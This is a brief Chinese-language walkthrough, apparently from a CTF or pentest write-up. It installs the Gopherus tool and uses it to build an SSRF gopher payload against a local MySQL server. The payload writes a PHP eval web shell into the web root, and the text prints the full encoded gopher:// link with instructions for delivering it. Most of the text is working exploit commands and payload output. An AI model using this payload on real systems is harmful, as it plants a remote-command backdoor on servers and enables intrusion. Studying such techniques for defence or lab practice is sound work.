需要安装这个工具,python2的pip也需要装上。 git clone https://github.com/tarunkant/Gopherus.git chmod +x install.sh ./install.sh curl https://bootstrap.pypa.io/pip/2.7/get-pip.py --output get-pip.py\n sudo python2 get-pip.py sudo ./install.sh 这就可以开始用了 python2 gopherus.py --exploit mysql Give MySQL username: root Give query to execute: select "<?php @eval($_POST['cmd']);?>" into outfile '/var/www/html/aa.php'; 这里很容易打错,错一个字母就完蛋
Your gopher link is ready to do SSRF : gopher://127.0.0.1:3306/_%a3%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%72%6f%6f%74%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%4c%00%00%00%03%73%65%6c%65%63%74%20%22%3c%3f%70%68%70%20%40%65%76%61%6c%28%24%5f%50%4f%53%54%5b%27%63%6d%64%27%5d%29%3b%3f%3e%22%20%69%6e%74%6f%20%6f%75%74%66%69%6c%65%20%27%2f%76%61%72%2f%77%77%77%2f%68%74%6d%6c%2f%61%61%2e%70%68%70%27%3b%01%00%00%00%01 将下划线后面的进行url编码后传入,木马就写入成功了。